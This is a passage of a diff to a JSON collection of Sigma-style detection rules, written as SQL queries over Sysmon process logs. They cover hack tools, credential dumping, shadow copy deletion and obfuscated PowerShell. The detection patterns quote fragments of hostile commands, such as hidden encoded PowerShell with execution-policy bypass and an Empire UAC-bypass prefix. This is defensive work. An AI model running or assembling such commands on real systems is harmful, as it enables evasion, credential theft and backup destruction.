OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities", - "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "status": "test", + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "HackTool - SecurityXploded Execution", - "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", - "status": "stable", - "description": "Detects the execution of SecurityXploded Tools", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_secutyxploded.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Set Suspicious Files as System Files Using Attrib.EXE", - "id": "efec536f-72e8-4656-8960-5e85d091345b", - "status": "experimental", - "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "Regsvr32 Spawning Explorer", - "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "status": "experimental", - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "author": "elhoim", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Trickbot Malware Activity", - "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", "status": "stable", - "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1559" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_trickbot_wermgr.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "UNC2452 Process Creation Patterns", - "id": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -9174,320 +8942,296 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%7z.exe a -v500m -mx9 -r0 -p%' ESCAPE '\\' OR (ParentCommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%.vbs%' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%.dll,Tk\\_%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows%' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /C %' ESCAPE '\\') OR (CommandLine LIKE '%rundll32 c:\\\\windows\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll %' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NOT (CommandLine IN (' ', '')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Suspicious WmiPrvse Child Process Spawned", - "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", 